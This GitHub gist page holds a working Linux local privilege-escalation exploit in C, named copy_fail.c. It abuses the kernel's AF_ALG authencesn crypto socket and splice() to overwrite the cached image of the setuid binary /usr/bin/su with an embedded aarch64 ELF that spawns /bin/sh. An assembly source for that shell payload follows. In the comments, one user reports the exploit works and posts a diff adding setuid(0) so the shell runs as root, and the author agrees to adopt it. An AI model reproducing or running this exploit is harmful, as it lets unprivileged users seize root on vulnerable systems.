Skip to content

Instantly share code, notes, and snippets.

@alufers

alufers/copy_fail.c

Last active May 4, 2026 14:47
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save alufers/921cd6c4b606c5014d6cc61eefb080fe to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save alufers/921cd6c4b606c5014d6cc61eefb080fe to your computer and use it in GitHub Desktop.
Download ZIP
copy fail c rewrite
Raw
copy_fail.c
// Compile: zig cc -target aarch64-linux-musl -static exp.c -o main_aarch64
// Embedded binary is for aarch64, the commented out is the original x86_64 one.
#define _GNU_SOURCE /* See feature_test_macros(7) */
#define _FILE_OFFSET_BITS 64
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <memory.h>
#include <fcntl.h>
void c(int f, int t, const uint8_t payload[4]) {
// socket(38, 5, 0)
int a = socket(AF_ALG, SOCK_SEQPACKET, 0);
// bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
int retval = bind(a, (struct sockaddr *)&sa, sizeof(sa));
if (retval < 0) {
perror("bind");
exit(1);
}
// setsockopt(279, 1, bytes.fromhex("0800010000000010" + "00" * 32))
uint8_t key[40] = {0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10};
setsockopt(a, SOL_ALG, ALG_SET_KEY, key, 40);
// setsockopt(279, 5, None, 4)
setsockopt(a, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
// accept()
int u = accept(a, NULL, NULL);
int o = t + 4;
// sendmsg([b"A"*4 + payload], [(279,3,b"\x00"*4), (279,2,b"\x10"+b"\x00"*19), (279,4,b"\x08"+b"\x00"*3)], 32768)
uint8_t msg_data[8];
memset(msg_data, 'A', 4);
memcpy(msg_data + 4, payload, 4);
struct iovec iov = { .iov_base = msg_data, .iov_len = 8 };
uint8_t buf_op[4] = {0};
uint8_t buf_iv[20] = {0x10};
uint8_t buf_ad[4] = {0x08};
size_t cmsg_space =
CMSG_SPACE(4) +
CMSG_SPACE(20) +
CMSG_SPACE(4);
uint8_t *cmsg_buf = calloc(1, cmsg_space);
struct msghdr msg = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = cmsg_buf,
.msg_controllen = cmsg_space,
};
struct cmsghdr *cm;
cm = CMSG_FIRSTHDR(&msg);
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_OP;
cm->cmsg_len = CMSG_LEN(4);
memcpy(CMSG_DATA(cm), buf_op, 4);
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = ALG_SET_IV;
cm->cmsg_len = CMSG_LEN(20);
memcpy(CMSG_DATA(cm), buf_iv, 20);
cm = CMSG_NXTHDR(&msg, cm);
cm->cmsg_level = SOL_ALG;
cm->cmsg_type = 4;
cm->cmsg_len = CMSG_LEN(4);
memcpy(CMSG_DATA(cm), buf_ad, 4);
sendmsg(u, &msg, MSG_MORE);
free(cmsg_buf);
// pipe()
int pipefd[2];
pipe(pipefd);
// splice(f, w, o, offset_src=0) — f has offset, w does not
loff_t off_src = 0;
splice(f, &off_src, pipefd[1], NULL, o, 0);
// splice(r, u.fileno(), o) — no offsets on either side
splice(pipefd[0], NULL, u, NULL, o, 0);
// recv(8 + t), ignoring errors
uint8_t rbuf[8 + 65536];
recv(u, rbuf, 8 + t, 0);
}
static unsigned char x[] = {
/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x9e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9e, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x31, 0xc0, 0x31, 0xff, 0xb0, 0x69, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x0f,
0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x0f, 0x05, 0x31,
0xff, 0x6a, 0x3c, 0x58, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
0x68, 0x00, 0x00, 0x00*/
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0xb7, 0x00, 0x01, 0x00, 0x00, 0x00,
0x0c, 0x01, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x60, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x03, 0x00, 0x40, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2c, 0x01, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe8, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x47, 0x4e, 0x55, 0x00, 0x0b, 0x3f, 0x5f, 0x92,
0xe5, 0x8c, 0x1e, 0x44, 0xc8, 0x15, 0xa7, 0xe3, 0x97, 0x66, 0xf7, 0x70,
0x4c, 0x09, 0x19, 0xa0, 0xff, 0x43, 0x00, 0xd1, 0xe0, 0x00, 0x08, 0x10,
0xe0, 0x03, 0x00, 0xf9, 0xff, 0x07, 0x00, 0xf9, 0xe1, 0x03, 0x00, 0x91,
0xe2, 0x03, 0x1f, 0xaa, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x00, 0x2e, 0x73, 0x68,
0x73, 0x74, 0x72, 0x74, 0x61, 0x62, 0x00, 0x2e, 0x6e, 0x6f, 0x74, 0x65,
0x2e, 0x67, 0x6e, 0x75, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x2d, 0x69,
0x64, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x2e, 0x64, 0x61, 0x74,
0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00,
0x07, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe8, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x1e, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0c, 0x01, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x41, 0x00,
0x00, 0x00, 0x00, 0x00, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
int main(int argc, char *argv[]) {
const char *BIN_PATH = "/usr/bin/su";
if (argc > 1) {
BIN_PATH = argv[1];
}
int f = open(BIN_PATH, 0);
if (f < 0) {
perror("open");
return 1;
}
size_t i = 0;
while (i < sizeof(x)) {
c(f, i, x + i);
i += 4;
}
system(BIN_PATH);
}
Raw
shell.s
// shell.s - execve("/bin/sh", ["/bin/sh", NULL], NULL) for aarch64
// clang --target=aarch64-linux-gnu -nostdlib -static -Wl,--strip-all -o shell shell.s
// then xxd -i ./shell and paste into the above code
.section .data
binsh: .asciz "/bin/sh"
.section .text
.global _start
_start:
// Reserve 16 bytes on stack (aligned), store argv array there
sub sp, sp, #16
adr x0, binsh // x0 = &"/bin/sh"
str x0, [sp] // argv[0] = &"/bin/sh"
str xzr, [sp, #8] // argv[1] = NULL
mov x1, sp // x1 = argv
mov x2, xzr // x2 = envp = NULL
mov x8, #221 // execve syscall
svc #0
@satgo1546
Copy link
Copy Markdown

satgo1546 commented Apr 30, 2026

Tested and confirms working on my aarch64 machine. Payload is missing a call to setuid to actually escalate to root:

--- i/shell.s
+++ w/shell.s
@@ -11,6 +11,10 @@ _start:
     // Reserve 16 bytes on stack (aligned), store argv array there
     sub     sp, sp, #16
 
+    mov     x0, #0          // x0 = 0 (root)
+    mov     x8, #146        // setuid syscall
+    svc     #0
+
     adr     x0, binsh       // x0 = &"/bin/sh"
 
     str     x0, [sp]        // argv[0] = &"/bin/sh"

@alufers
Copy link
Copy Markdown
Author

alufers commented Apr 30, 2026

Oh nice, thanks. Will update the files.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment